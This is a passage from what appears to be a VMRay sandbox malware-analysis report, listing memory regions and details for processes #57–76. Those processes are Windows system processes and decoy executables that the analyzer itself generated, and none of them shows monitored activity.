| private_0x00000000050a0000 | 0x050a0000 | 0x0511ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005120000 | 0x05120000 | 0x0521ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005220000 | 0x05220000 | 0x05222fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x05232fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005240000 | 0x05240000 | 0x05240fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005250000 | 0x05250000 | 0x05250fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005260000 | 0x05260000 | 0x05268fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005270000 | 0x05270000 | 0x05273fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005280000 | 0x05280000 | 0x05280fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000052a0000 | 0x052a0000 | 0x052a8fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052b0000 | 0x052b0000 | 0x052b0fff | Private Memory | rw |
|
|
|
- |
| thumbcache_48.db | 0x052c0000 | 0x053bffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00000000053c0000 | 0x053c0000 | 0x053c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005420000 | 0x05420000 | 0x05467fff | Private Memory | rw |
|
|
|
- |
| netmsg.dll | 0x05470000 | 0x05470fff | Memory Mapped File | r |
|
|
|
- |
| netmsg.dll.mui | 0x05480000 | 0x054b1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000054c0000 | 0x054c0000 | 0x0553ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005540000 | 0x05540000 | 0x05d3ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000005d40000 | 0x05d40000 | 0x05d4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000005d50000 | 0x05d50000 | 0x05d5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000005d60000 | 0x05d60000 | 0x05d6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| wscui.cpl.mui | 0x05d70000 | 0x05d81fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000005d90000 | 0x05d90000 | 0x05d91fff | Pagefile Backed Memory | r |
|
|
|
- |
| hcproviders.dll.mui | 0x05da0000 | 0x05da1fff | Memory Mapped File | r |
|
|
|
- |
| windows.storage.dll.mui | 0x05db0000 | 0x05db7fff | Memory Mapped File | r |
|
|
|
- |
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000035.db | 0x05dd0000 | 0x05debfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000005df0000 | 0x05df0000 | 0x05df2fff | Pagefile Backed Memory | r |
|
|
|
- |
| counters.dat | 0x05e00000 | 0x05e00fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000005e10000 | 0x05e10000 | 0x05e1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005e50000 | 0x05e50000 | 0x05e51fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005e60000 | 0x05e60000 | 0x05ea7fff | Private Memory | rw |
|
|
|
- |
| grooveintlresource.dll | 0x05f30000 | 0x067b2fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000067c0000 | 0x067c0000 | 0x0683ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006840000 | 0x06840000 | 0x06888fff | Private Memory | rw |
|
|
|
- |
| appdb.dat | 0x06890000 | 0x08c11fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000008c20000 | 0x08c20000 | 0x08c9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008ca0000 | 0x08ca0000 | 0x08d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000008d20000 | 0x08d20000 | 0x08d9ffff | Private Memory | rw |
|
|
|
- |
| actioncenter.dll.mui | 0x08db0000 | 0x08dbafff | Memory Mapped File | r |
|
|
|
- |
| iconcache_48.db | 0x08dc0000 | 0x08ebffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000008f20000 | 0x08f20000 | 0x08f9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000009020000 | 0x09020000 | 0x09020fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000009030000 | 0x09030000 | 0x09030fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009040000 | 0x09040000 | 0x09040fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009050000 | 0x09050000 | 0x090cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000009150000 | 0x09150000 | 0x091cffff | Private Memory | rw |
|
|
|
- |
| thumbcache_256.db | 0x091d0000 | 0x092cffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000092d0000 | 0x092d0000 | 0x0934ffff | Private Memory | rw |
|
|
|
- |
| winnlsres.dll | 0x093d0000 | 0x093d4fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll.mui | 0x093e0000 | 0x093effff | Memory Mapped File | r |
|
|
|
- |
| mswsock.dll.mui | 0x093f0000 | 0x093f2fff | Memory Mapped File | r |
|
|
|
- |
|
For performance reasons, the remaining 302 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #57: shellexperiencehost.exe
0
0
| Information | Value |
|---|---|
| ID | #57 |
| File Name | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe |
| Command Line | "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca |
| Initial Working Directory | C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9b0 |
| Parent PID | 0x240 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8D4
0x
868
0x
8B4
0x
51C
0x
BCC
0x
BC8
0x
BC4
0x
BC0
0x
BBC
0x
BB8
0x
BB4
0x
BB0
0x
BAC
0x
BA8
0x
BA4
0x
BA0
0x
B9C
0x
B98
0x
B94
0x
B90
0x
B8C
0x
B88
0x
B84
0x
B80
0x
B7C
0x
B78
0x
B70
0x
B64
0x
B54
0x
B50
0x
AE8
0x
ACC
0x
AC0
0x
A08
0x
A00
0x
9FC
0x
9F4
0x
9F0
0x
9EC
0x
9E0
0x
9DC
0x
9D8
0x
9D4
0x
9D0
0x
9CC
0x
9C8
0x
9BC
0x
9B4
|
Process #58: searchui.exe
0
0
| Information | Value |
|---|---|
| ID | #58 |
| File Name | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe |
| Command Line | "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca |
| Initial Working Directory | C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa1c |
| Parent PID | 0x240 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
F54
0x
EF0
0x
AB8
0x
AAC
0x
AA8
0x
AA4
0x
AA0
0x
A9C
0x
A98
0x
A94
0x
A90
0x
A8C
0x
A88
0x
A84
0x
A78
0x
A64
0x
A5C
0x
A58
0x
A50
0x
A4C
0x
A38
0x
A28
0x
A20
|
Process #59: nigeria reached hindu.exe
0
0
| Information | Value |
|---|---|
| ID | #59 |
| File Name | c:\program files\reference assemblies\nigeria reached hindu.exe |
| Command Line | "C:\Program Files\Reference Assemblies\nigeria reached hindu.exe" |
| Initial Working Directory | C:\Program Files\Reference Assemblies\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1fc |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
918
0x
200
|
Process #60: style-percent.exe
0
0
| Information | Value |
|---|---|
| ID | #60 |
| File Name | c:\program files\windows media player\style-percent.exe |
| Command Line | "C:\Program Files\Windows Media Player\style-percent.exe" |
| Initial Working Directory | C:\Program Files\Windows Media Player\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x328 |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A2C
0x
34C
|
Process #61: italian.exe
0
0
| Information | Value |
|---|---|
| ID | #61 |
| File Name | c:\program files\uninstall information\italian.exe |
| Command Line | "C:\Program Files\Uninstall Information\italian.exe" |
| Initial Working Directory | C:\Program Files\Uninstall Information\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x404 |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
F0
0x
438
|
Process #62: november.exe
0
0
| Information | Value |
|---|---|
| ID | #62 |
| File Name | c:\program files (x86)\google\november.exe |
| Command Line | "C:\Program Files (x86)\Google\november.exe" |
| Initial Working Directory | C:\Program Files (x86)\Google\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x520 |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
1A4
0x
5F0
|
Process #63: photoshop_hormone_protein.exe
0
0
| Information | Value |
|---|---|
| ID | #63 |
| File Name | c:\program files (x86)\windows media player\photoshop_hormone_protein.exe |
| Command Line | "C:\Program Files (x86)\Windows Media Player\photoshop_hormone_protein.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Media Player\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa80 |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
2F4
0x
A7C
|
Process #64: expenditurevincenttablet.exe
0
0
| Information | Value |
|---|---|
| ID | #64 |
| File Name | c:\program files\msbuild\expenditurevincenttablet.exe |
| Command Line | "C:\Program Files\MSBuild\expenditurevincenttablet.exe" |
| Initial Working Directory | C:\Program Files\MSBuild\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x514 |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
4E8
0x
778
|
Process #65: deaths.exe
0
0
| Information | Value |
|---|---|
| ID | #65 |
| File Name | c:\program files (x86)\windows nt\deaths.exe |
| Command Line | "C:\Program Files (x86)\Windows NT\deaths.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows NT\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2f0 |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B6C
0x
7BC
|
Process #66: alfred.exe
0
0
| Information | Value |
|---|---|
| ID | #66 |
| File Name | c:\program files\microsoft office 15\alfred.exe |
| Command Line | "C:\Program Files\Microsoft Office 15\alfred.exe" |
| Initial Working Directory | C:\Program Files\Microsoft Office 15\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x534 |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
84
0x
BDC
|
Process #67: admit.exe
0
0
| Information | Value |
|---|---|
| ID | #67 |
| File Name | c:\program files (x86)\reference assemblies\admit.exe |
| Command Line | "C:\Program Files (x86)\Reference Assemblies\admit.exe" |
| Initial Working Directory | C:\Program Files (x86)\Reference Assemblies\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb3c |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
418
0x
85C
|
Process #68: set.exe
0
0
| Information | Value |
|---|---|
| ID | #68 |
| File Name | c:\program files (x86)\windows nt\set.exe |
| Command Line | "C:\Program Files (x86)\Windows NT\set.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows NT\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8a4 |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
ADC
0x
390
|
Process #69: regulations_consensus_score.exe
0
0
| Information | Value |
|---|---|
| ID | #69 |
| File Name | c:\program files (x86)\windows portable devices\regulations_consensus_score.exe |
| Command Line | "C:\Program Files (x86)\Windows Portable Devices\regulations_consensus_score.exe" |
| Initial Working Directory | C:\Program Files (x86)\Windows Portable Devices\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x380 |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9B8
0x
8D0
|
Process #70: upgrading.exe
0
0
| Information | Value |
|---|---|
| ID | #70 |
| File Name | c:\program files (x86)\common files\upgrading.exe |
| Command Line | "C:\Program Files (x86)\Common Files\upgrading.exe" |
| Initial Working Directory | C:\Program Files (x86)\Common Files\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x854 |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BF8
0x
454
|
Process #71: syria promptly.exe
0
0
| Information | Value |
|---|---|
| ID | #71 |
| File Name | c:\program files (x86)\google\syria promptly.exe |
| Command Line | "C:\Program Files (x86)\Google\syria promptly.exe" |
| Initial Working Directory | C:\Program Files (x86)\Google\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x504 |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
2C4
0x
1F4
|
Process #72: tones engaging.exe
0
0
| Information | Value |
|---|---|
| ID | #72 |
| File Name | c:\program files\windows multimedia platform\tones engaging.exe |
| Command Line | "C:\Program Files\Windows Multimedia Platform\tones engaging.exe" |
| Initial Working Directory | C:\Program Files\Windows Multimedia Platform\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8cc |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
708
0x
950
|
Process #73: restaurant.exe
0
0
| Information | Value |
|---|---|
| ID | #73 |
| File Name | c:\program files\windows portable devices\restaurant.exe |
| Command Line | "C:\Program Files\Windows Portable Devices\restaurant.exe" |
| Initial Working Directory | C:\Program Files\Windows Portable Devices\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x52c |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
120
0x
BF4
|
Process #74: th-italia.exe
0
0
| Information | Value |
|---|---|
| ID | #74 |
| File Name | c:\program files\windows mail\th-italia.exe |
| Command Line | "C:\Program Files\Windows Mail\th-italia.exe" |
| Initial Working Directory | C:\Program Files\Windows Mail\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x41c |
| Parent PID | 0x820 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
700
0x
2D4
|
Process #75: audiodg.exe
0
0
| Information | Value |
|---|---|
| ID | #75 |
| File Name | c:\windows\system32\audiodg.exe |
| Command Line | C:\Windows\system32\AUDIODG.EXE 0x80c |
| Initial Working Directory | C:\Windows |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x164 |
| Parent PID | 0x340 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B60
0x
B58
0x
814
0x
8D8
0x
860
|
Process #76: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #76 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k UnistackSvcGroup |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x458 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
EE4
0x
388
0x
15C
0x
ECC
0x
A3C
0x
EA0
0x
948
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000e45d3e0000 | 0xe45d3e0000 | 0xe45d3effff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xe45d3f0000 | 0xe45d3f0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000e45d400000 | 0xe45d400000 | 0xe45d413fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000e45d420000 | 0xe45d420000 | 0xe45d49ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000e45d4a0000 | 0xe45d4a0000 | 0xe45d4a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000e45d4b0000 | 0xe45d4b0000 | 0xe45d4b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000e45d4c0000 | 0xe45d4c0000 | 0xe45d4c1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000e45d4d0000 | 0xe45d4d0000 | 0xe45d4d0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000e45d4e0000 | 0xe45d4e0000 | 0xe45d4e0fff | Private Memory | rw |
|
|
|
- |
| phoneutilres.dll | 0xe45d4f0000 | 0xe45d4f0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000e45d500000 | 0xe45d500000 | 0xe45d500fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000e45d510000 | 0xe45d510000 | 0xe45d510fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000e45d520000 | 0xe45d520000 | 0xe45d520fff | Pagefile Backed Memory | r |
|
|
|
- |
| syncres.dll | 0xe45d530000 | 0xe45d530fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000e45d540000 | 0xe45d540000 | 0xe45d546fff | Private Memory | rw |
|
|
|
- |
| private_0x000000e45d550000 | 0xe45d550000 | 0xe45d5cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000e45d5d0000 | 0xe45d5d0000 | 0xe45d5f9fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000e45d600000 | 0xe45d600000 | 0xe45d6fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xe45d700000 | 0xe45d7bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000e45d8a0000 | 0xe45d8a0000 | 0xe45d8a6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000e45d900000 | 0xe45d900000 | 0xe45d9fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000e45da00000 | 0xe45da00000 | 0xe45db87fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000e45db90000 | 0xe45db90000 | 0xe45dd10fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000e45dd20000 | 0xe45dd20000 | 0xe45f11ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000e45f120000 | 0xe45f120000 | 0xe45f21ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e45f220000 | 0xe45f220000 | 0xe45f31ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e45f320000 | 0xe45f320000 | 0xe45f41ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e45f420000 | 0xe45f420000 | 0xe45f51ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000e45f520000 | 0xe45f520000 | 0xe45f61ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xe45f620000 | 0xe45f956fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff830000 | 0x7df5ff830000 | 0x7ff5ff82ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff78708e000 | 0x7ff78708e000 | 0x7ff78708ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff787090000 | 0x7ff787090000 | 0x7ff78718ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff787190000 | 0x7ff787190000 | 0x7ff7871b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7871b4000 | 0x7ff7871b4000 | 0x7ff7871b5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7871b6000 | 0x7ff7871b6000 | 0x7ff7871b7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7871b8000 | 0x7ff7871b8000 | 0x7ff7871b8fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7871ba000 | 0x7ff7871ba000 | 0x7ff7871bbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7871bc000 | 0x7ff7871bc000 | 0x7ff7871bdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7871be000 | 0x7ff7871be000 | 0x7ff7871bffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff787ec0000 | 0x7ff787eccfff | Memory Mapped File | rwx |
|
|
|
- |
| accountaccessor.dll | 0x7ffade660000 | 0x7ffade695fff | Memory Mapped File | rwx |
|
|
|
- |
| cemapi.dll | 0x7ffade6a0000 | 0x7ffade6dffff | Memory Mapped File | rwx |
|
|
|
- |
| userdatalanguageutil.dll | 0x7ffade6e0000 | 0x7ffade6f0fff | Memory Mapped File | rwx |
|
|
|
- |
| synccontroller.dll | 0x7ffade7c0000 | 0x7ffade82bfff | Memory Mapped File | rwx |
|
|
|
- |
| phoneutil.dll | 0x7ffadeae0000 | 0x7ffadeb20fff | Memory Mapped File | rwx |
|
|
|
- |
| pimstore.dll | 0x7ffadeb30000 | 0x7ffadeca0fff | Memory Mapped File | rwx |
|
|
|
- |
| syncutil.dll | 0x7ffadecb0000 | 0x7ffadecf6fff | Memory Mapped File | rwx |
